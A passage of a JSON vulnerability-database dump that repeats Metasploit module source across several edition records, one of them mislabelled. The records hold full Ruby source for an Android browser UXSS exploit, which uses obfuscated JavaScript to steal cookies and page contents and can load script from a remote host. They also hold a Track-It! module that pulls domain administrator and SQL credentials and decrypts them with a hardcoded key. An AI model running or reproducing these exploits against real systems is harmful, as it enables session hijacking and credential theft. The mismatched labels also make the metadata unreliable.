steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-17T14:33:47", "differentElements": ["sourceData"], "edition": 78}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "66526d54b1c2468cc1565418836e346e", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-07-03T23:43:27", "history": [], "viewCount": 73, "enchantments": {"score": {"value": -0.5, "vector": "NONE", "modified": "2019-06-17T14:33:47"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310704464", "OPENVAS:1361412562310891819", "OPENVAS:1361412562310891822", "OPENVAS:1361412562310891818", "OPENVAS:1361412562310704463", "OPENVAS:1361412562310704462", "OPENVAS:1361412562310876483", "OPENVAS:1361412562310876485", "OPENVAS:1361412562310876491", "OPENVAS:1361412562310876488"]}, {"type": "freebsd", "idList": ["82C07DFA-9016-11E9-AF2F-712C38AA3E4C"]}, {"type": "threatpost", "idList": ["THREATPOST:1BBD92583C879148DB007D70752729A6"]}, {"type": "zdt", "idList": ["1337DAY-ID-32865", "1337DAY-ID-32866"]}, {"type": "xen", "idList": ["XSA-295"]}, {"type": "kitploit", "idList": ["KITPLOIT:2814971718646835741"]}], "modified": "2019-06-17T14:33:47"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-03T23:43:27", "differentElements": ["sourceData"], "edition": 79}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "db76ae0fa338dee6799587fb9bf8ebf6", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-07-04T01:44:18", "history": [], "viewCount": 73, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2019-07-04T01:44:18"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310891843", "OPENVAS:1361412562310704474", "OPENVAS:1361412562310704475", "OPENVAS:1361412562310891842", "OPENVAS:1361412562310891840"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:B2D60F0B4C477E99E6B55ED9B1E86399"]}, {"type": "zdt", "idList": ["1337DAY-ID-32947", "1337DAY-ID-32941", "1337DAY-ID-32936", "1337DAY-ID-32949", "1337DAY-ID-32930", "1337DAY-ID-32946", "1337DAY-ID-32945", "1337DAY-ID-32933", "1337DAY-ID-32944", "1337DAY-ID-32938"]}], "modified": "2019-07-04T01:44:18"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-04T01:44:18", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 80}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "96f05bb20f324c56416516550f435455", "type": "metasploit", "bulletinFamily": "exploit", "title": "BMC / Numara Track-It! Domain Administrator and SQL Server User Password Disclosure", "description": "This module exploits an unauthenticated configuration retrieval .NET remoting service in Numara / BMC Track-It! v9 to v11.X, which can be abused to retrieve the Domain Administrator and the SQL server user credentials. This module has been tested successfully on versions 11.3.0.355, 10.0.51.135, 10.0.50.107, 10.0.0.143 and 9.0.30.248.\n", "published": "2014-10-07T22:54:43", "modified": "2018-09-15T23:54:45", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4872", "https://seclists.org/fulldisclosure/2014/Oct/34"], "cvelist": ["CVE-2014-4872"], "lastseen": "2019-07-05T15:42:45", "history": [], "viewCount": 73, "enchantments": {"score": {"value": 6.7, "vector": "NONE", "modified": "2019-07-05T15:42:45"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-4872"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:128775", "PACKETSTORM:128594", "PACKETSTORM:146110"]}, {"type": "zdt", "idList": ["1337DAY-ID-22776", "1337DAY-ID-22737"]}, {"type": "exploitdb", "idList": ["EDB-ID:34924", "EDB-ID:35032", "EDB-ID:43883"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/TRACKIT_FILE_UPLOAD", "MSF:AUXILIARY/GATHER/TRACKIT_SQL_DOMAIN_CREDS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105932"]}, {"type": "seebug", "idList": ["SSV:87308"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14007", "SECURITYVULNS:DOC:31163"]}, {"type": "cert", "idList": ["VU:121036"]}], "modified": "2019-07-05T15:42:45"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/trackit_sql_domain_creds.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'openssl'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BMC / Numara Track-It! Domain Administrator and SQL Server User Password Disclosure',\n 'Description' => %q{\n This module exploits an unauthenticated configuration retrieval .NET remoting\n service in Numara / BMC Track-It! v9 to v11.X, which can be abused to retrieve the Domain\n Administrator and the SQL server user credentials.\n This module has been tested successfully on versions 11.3.0.355, 10.0.51.135, 10.0.50.107,\n 10.0.0.143 and 9.0.30.248.\n },\n 'Author' =>\n [\n 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2014-4872' ],\n [ 'OSVDB', '112741' ],\n [ 'US-CERT-VU', '121036' ],\n [ 'URL', 'https://seclists.org/fulldisclosure/2014/Oct/34' ]\n ],\n 'DisclosureDate' => 'Oct 7 2014'\n ))\n register_options(\n [\n OptPort.new('RPORT',\n [true, '.NET remoting service port', 9010])\n ])\n end\n\n\n def prepare_packet(bmc)\n #\n # ConfigurationService packet structure:\n #\n # packet_header_pre_packet_size\n # packet_size (4 bytes)\n # packet_header_pre_uri_size\n # uri_size (2 bytes)\n # packet_header_pre_uri\n # uri\n # packet_header_post_uri\n # packet_body_start_pre_method_size\n # method_size (1 byte)\n # method\n # packet_body_pre_type_size\n # type_size (1 byte)\n # packet_body_pre_type\n # type\n # @packet_terminator\n #\n # .NET remoting packet spec can be found at http://msdn.microsoft.com/en-us/library/cc237454.aspx\n #\n # P.S.: Lots of fun stuff can be obtained from the response. Highlights include:\n # - DatabaseServerName\n # - DatabaseName\n # - SchemaOwnerDatabaseUser\n # - EncryptedSystemDatabasePassword\n # - DomainAdminUserName\n # - DomainAdminEncryptedPassword\n #\n packet_header_pre_packet_size= [\n 0x2e, 0x4e, 0x45, 0x54, 0x01, 0x00, 0x00, 0x00,\n 0x00, 0x00\n ]\n\n packet_header_pre_uri_size = [\n 0x04, 0x00, 0x01, 0x01\n ]\n\n packet_header_pre_uri = [\n 0x00, 0x00\n ]\n\n # contains binary type (application/octet-stream)\n packet_header_post_uri = [\n 0x06, 0x00, 0x01, 0x01, 0x18, 0x00, 0x00, 0x00,\n 0x61, 0x70, 0x70, 0x6c, 0x69, 0x63, 0x61, 0x74,\n 0x69, 0x6f, 0x6e, 0x2f, 0x6f, 0x63, 0x74, 0x65,\n 0x74, 0x2d, 0x73, 0x74, 0x72, 0x65, 0x61, 0x6d,\n 0x00, 0x00\n ]\n\n packet_body_start_pre_method_size = [\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x15, 0x11, 0x00, 0x00, 0x00, 0x12\n ]\n\n packet_body_pre_type_size = [ 0x12 ]\n\n packet_body_pre_type = [ 0x01 ]\n\n @packet_terminator = [ 0x0b ]\n\n service = \"TrackIt.Core.ConfigurationService\".gsub(/TrackIt/,(bmc ? \"Trackit\" : \"Numara.TrackIt\"))\n method = \"GetProductDeploymentValues\".gsub(/TrackIt/,(bmc ? \"Trackit\" : \"Numara.TrackIt\"))\n type = \"TrackIt.Core.Configuration.IConfigurationSecureDelegator, TrackIt.Core.Configuration, Version=11.3.0.355, Culture=neutral, PublicKeyToken=null\".gsub(/TrackIt/,(bmc ? \"TrackIt\" : \"Numara.TrackIt\"))\n\n uri = \"tcp://\" + rhost + \":\" + rport.to_s + \"/\" + service\n\n packet_size =\n packet_header_pre_uri_size.length +\n 2 + # uri_size\n packet_header_pre_uri.length +\n uri.length +\n packet_header_post_uri.length +\n packet_body_start_pre_method_size.length +\n 1 + # method_size\n method.length +\n packet_body_pre_type_size.length +\n 1 + # type_size\n packet_body_pre_type.length +\n type.length\n\n # start of packet and packet size (4 bytes)\n buf = packet_header_pre_packet_size.pack('C*')\n buf << Array(packet_size).pack('L*')\n\n # uri size (2 bytes)\n buf << packet_header_pre_uri_size.pack('C*')\n buf << Array(uri.length).pack('S*')\n\n # uri\n buf << packet_header_pre_uri.pack('C*')\n buf << uri.bytes.to_a.pack('C*')\n buf << packet_header_post_uri.pack('C*')\n\n # method name\n buf << packet_body_start_pre_method_size.pack('C*')\n buf << Array(method.length).pack('C*')\n buf << method.bytes.to_a.pack('C*')\n\n # type name\n buf << packet_body_pre_type_size.pack('C*')\n buf << Array(type.length).pack('C*')\n buf << packet_body_pre_type.pack('C*')\n buf << type.bytes.to_a.pack('C*')\n\n buf << @packet_terminator.pack('C*')\n\n return buf\n end\n\n\n def fill_loot_from_packet(packet_reply, loot)\n loot.each_key { |str|\n if loot[str] != nil\n next\n end\n if (index = (packet_reply.index(str))) != nil\n # after str, discard 5 bytes then get str_value\n size = packet_reply[index + str.length + 5,1].unpack('C*')[0]\n if size == 255\n # if we received 0xFF then there is no value for this str\n # set it to empty but not nil so that we don't look for it again\n loot[str] = \"\"\n next\n end\n loot[str] = packet_reply[index + str.length + 6, size]\n end\n }\n end\n\n\n def run\n packet = prepare_packet(true)\n\n sock = connect\n if sock.nil?\n fail_with(Failure::Unreachable, \"#{rhost}:#{rport.to_s} - Failed to connect to remoting service\")\n else\n print_status(\"#{rhost}:#{rport} - Sending packet to ConfigurationService...\")\n end\n sock.write(packet)\n\n # type of database (Oracle or SQL Server)\n database_type = \"DatabaseType\"\n # Database server name (host\\sid for Oracle or host\\login_name for SQL Server)\n database_server_name = \"DatabaseServerName\"\n database_name = \"DatabaseName\"\n schema_owner = \"SchemaOwnerDatabaseUser\"\n database_pw = \"EncryptedSystemDatabasePassword\"\n domain_admin_name = \"DomainAdminUserName\"\n domain_admin_pw = \"DomainAdminEncryptedPassword\"\n\n loot = {\n database_type => nil,\n database_server_name => nil,\n database_name => nil,\n schema_owner => nil,\n database_pw => nil,\n domain_admin_name => nil,\n domain_admin_pw => nil\n }\n\n # We only break when we have a timeout (up to 15 seconds wait) or have all we need\n while true\n ready = IO.select([sock], nil, nil, 15)\n if ready\n packet_reply = sock.readpartial(4096)\n else\n print_error(\"#{rhost}:#{rport} - Socket timed out after 15 seconds, try again if no credentials are dumped below.\")\n break\n end\n if packet_reply =~ /Service not found/\n # This is most likely an older Numara version, re-do the packet and send again.\n print_error(\"#{rhost}:#{rport} - Received \\\"Service not found\\\", trying again with new packet...\")\n sock.close\n sock = connect\n if sock.nil?\n fail_with(Failure::Unreachable, \"#{rhost}:#{rport.to_s} - Failed to connect to remoting service\")\n else\n print_status(\"#{rhost}:#{rport} - Sending packet to ConfigurationService...\")\n end\n packet = prepare_packet(false)\n sock.write(packet)\n packet_reply = sock.readpartial(4096)\n end\n\n fill_loot_from_packet(packet_reply, loot)\n\n if not loot.has_value?(nil)\n break\n end\n end\n sock.close\n\n # now set the values that were not found back to nil\n loot.each_key { |str| (loot[str] == \"\" ? loot[str] = nil : next) }\n\n if loot[database_type]\n print_good(\"#{rhost}:#{rport} - Got database type: #{loot[database_type]}\")\n end\n\n if loot[database_server_name]\n print_good(\"#{rhost}:#{rport} - Got database server name: #{loot[database_server_name]}\")\n end\n\n if loot[database_name]\n print_good(\"#{rhost}:#{rport} - Got database name: #{loot[database_name]}\")\n end\n\n if loot[schema_owner]\n print_good(\"#{rhost}:#{rport} - Got database user name: #{loot[schema_owner]}\")\n end\n\n if loot[database_pw]\n cipher = OpenSSL::Cipher.new(\"des\")\n cipher.decrypt\n cipher.key = 'NumaraTI'\n cipher.iv = 'NumaraTI'\n loot[database_pw] = cipher.update(Rex::Text.decode_base64(loot[database_pw]))\n loot[database_pw] << cipher.final\n print_good(\"#{rhost}:#{rport} - Got database password: #{loot[database_pw]}\")\n end\n\n if loot[domain_admin_name]\n print_good(\"#{rhost}:#{rport} - Got domain administrator username: #{loot[domain_admin_name]}\")\n end\n\n if loot[domain_admin_pw]\n cipher = OpenSSL::Cipher.new(\"des\")\n cipher.decrypt\n cipher.key = 'NumaraTI'\n cipher.iv = 'NumaraTI'\n loot[domain_admin_pw] = cipher.update(Rex::Text.decode_base64(loot[domain_admin_pw]))\n loot[domain_admin_pw] << cipher.final\n print_good(\"#{rhost}:#{rport} - Got domain administrator password: #{loot[domain_admin_pw]}\")\n end\n\n if loot[schema_owner] and loot[database_pw] and loot[database_type] and loot[database_server_name]\n # If it is Oracle we need to save the SID for creating the Credential Core, else we don't care\n if loot[database_type] =~ /Oracle/i\n sid = loot[database_server_name].split('\\\\')[1]\n else\n sid = nil\n end\n\n credential_core = report_credential_core({\n password: loot[database_pw],\n username: loot[schema_owner],\n sid: sid\n })\n\n # Get just the hostname\n db_address= loot[database_server_name].split('\\\\')[0]\n\n begin\n database_login_data = {\n address: ::Rex::Socket.getaddress(db_address, true),\n service_name: loot[database_type],\n protocol: 'tcp',\n workspace_id: myworkspace_id,\n core: credential_core,\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n # If it's Oracle, use the Oracle port, else use MSSQL\n if loot[database_type] =~ /Oracle/i\n database_login_data[:port] = 1521\n else\n database_login_data[:port] = 1433\n end\n create_credential_login(database_login_data)\n # Skip creating the Login, but tell the user about it if we cannot resolve the DB Server Hostname\n rescue SocketError\n print_error \"Could not resolve Database Server Hostname.\"\n end\n\n print_status(\"#{rhost}:#{rport} - Stored SQL credentials: #{loot[database_server_name]}:#{loot[schema_owner]}:#{loot[database_pw]}\")\n end\n\n if loot[domain_admin_name] and loot[domain_admin_pw]\n report_credential_core({\n password: loot[domain_admin_pw],\n username: loot[domain_admin_name].split('\\\\')[1],\n domain: loot[domain_admin_name].split('\\\\')[0]\n })\n\n print_status(\"#{rhost}:#{rport} - Stored domain credentials: #{loot[domain_admin_name]}:#{loot[domain_admin_pw]}\")\n end\n end\n\n\n def report_credential_core(cred_opts={})\n # Set up the has for our Origin service\n origin_service_data = {\n address: rhost,\n port: rport,\n service_name: 'Domain',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: self.fullname,\n private_type: :password,\n private_data: cred_opts[:password],\n username: cred_opts[:username]\n }\n\n if cred_opts[:domain]\n credential_data.merge!({\n realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,\n realm_value: cred_opts[:domain]\n })\n elsif cred_opts[:sid]\n credential_data.merge!({\n realm_key: Metasploit::Model::Realm::Key::ORACLE_SYSTEM_IDENTIFIER,\n realm_value: cred_opts[:sid]\n })\n end\n\n credential_data.merge!(origin_service_data)\n create_credential(credential_data)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-05T15:42:45", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 81}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "db76ae0fa338dee6799587fb9bf8ebf6", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-07-05T19:41:49", "history": [], "viewCount": 73, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2019-07-05T19:41:49"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310891844", "OPENVAS:1361412562310883077", "OPENVAS:1361412562310876554", "OPENVAS:1361412562310876555", "OPENVAS:1361412562310883078", "OPENVAS:1361412562310891843", "OPENVAS:1361412562310704474", "OPENVAS:1361412562310844077", "OPENVAS:1361412562310876552", "OPENVAS:1361412562310704475"]}, {"type": "ubuntu", "idList": ["USN-4038-4", "USN-4038-3"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:B2D60F0B4C477E99E6B55ED9B1E86399"]}, {"type": "zdt", "idList": ["1337DAY-ID-32952", "1337DAY-ID-32941"]}], "modified": "2019-07-05T19:41:49"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n 